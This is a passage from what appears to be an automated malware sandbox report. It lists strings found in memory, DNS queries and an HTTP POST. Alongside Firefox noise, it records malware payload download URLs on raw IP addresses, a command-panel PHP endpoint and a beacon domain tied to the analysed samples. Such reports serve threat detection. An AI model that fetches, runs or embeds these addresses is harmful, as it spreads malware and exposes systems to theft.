style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3624693263.000001C23CCF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E088000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/(
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: 79ddad050f.exe, 00000008.00000002.3287630527.00000000058E0000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262115190.0000000000EFB000.00000004.00000010.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exeData
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exek
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe8
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: e051bdf457.exe, 00000009.00000002.3254990045.00000000002D4000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001308000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3254990045.00000000002D4000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: e051bdf457.exe, 00000009.00000002.3265209742.00000000012F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpD
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpH
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS
Source: e051bdf457.exe, 00000009.00000002.3254990045.00000000003B7000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpSxS
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpT
Source: e051bdf457.exe, 00000009.00000002.3254990045.00000000003B7000.00000040.00000001.01000000.0000000C.sdmp, e051bdf457.exe, 00000009.00000002.3254990045.00000000002D4000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUser
Source: e051bdf457.exe, 00000009.00000002.3254990045.00000000002D4000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: e051bdf457.exe, 00000009.00000002.3254990045.000000000031C000.00000040.00000001.01000000.0000000C.sdmp, e051bdf457.exe, 00000009.00000002.3254990045.00000000003B7000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpinit.exe
Source: e051bdf457.exe, 00000009.00000002.3254990045.00000000003B7000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001308000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.00000000012F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
Source: e051bdf457.exe, 00000009.00000002.3254990045.00000000003B7000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.20668b591d6548ec281/sqlite3.dll
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
Source: skotes.exe, 00000006.00000002.3269197197.0000000001039000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpA.
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000006.00000002.3269197197.000000000105B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3269197197.0000000001039000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.3269197197.0000000001039000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exeEi
Source: skotes.exe, 00000006.00000002.3269197197.000000000105B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exeed
Source: 4611cc433b.exe, 00000007.00000002.3265991208.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empI
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empKD
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empZDP
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empry
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empxD
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/download
Source: 4611cc433b.exe, 00000007.00000002.3265991208.00000000010B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/key(
Source: 4611cc433b.exe, 00000007.00000003.3243631746.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000002.3290845320.000000000582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloa)5
Source: 4611cc433b.exe, 00000007.00000003.3137633696.000000000582E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download
Source: 4611cc433b.exe, 00000007.00000003.3217243065.000000000582B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download.5
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download0/files/download
Source: 4611cc433b.exe, 00000007.00000003.3163894941.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3112387796.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3190888969.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3217243065.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3137633696.000000000582E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download05
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download7T
Source: 4611cc433b.exe, 00000007.00000003.3163894941.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3084697662.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3112387796.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3190888969.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3217243065.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3137633696.000000000582E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download:5A
Source: 4611cc433b.exe, 00000007.00000003.3217243065.000000000582B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadN5
Source: 4611cc433b.exe, 00000007.00000002.3265991208.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadV5
Source: 4611cc433b.exe, 00000007.00000003.3243631746.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3163894941.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3084697662.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3112387796.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3190888969.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3217243065.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000002.3290845320.000000000582C000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3059188991.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3137633696.000000000582E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadX
Source: 4611cc433b.exe, 00000007.00000002.3265991208.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadX5
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadaS
Source: 4611cc433b.exe, 00000007.00000002.3265991208.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadl
Source: 4611cc433b.exe, 00000007.00000002.3265991208.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadq
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadsS
Source: 4611cc433b.exe, 00000007.00000002.3287900266.0000000005490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadyT
Source: 4611cc433b.exe, 00000007.00000003.3243631746.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000002.3290845320.000000000582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/filesH5
Source: 4611cc433b.exe, 00000007.00000002.3265991208.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/olicies
Source: 4611cc433b.exe, 00000007.00000003.3163894941.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3084697662.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3112387796.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3190888969.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3032447752.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3217243065.000000000582B000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3059188991.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000003.3137633696.000000000582E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/x5
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
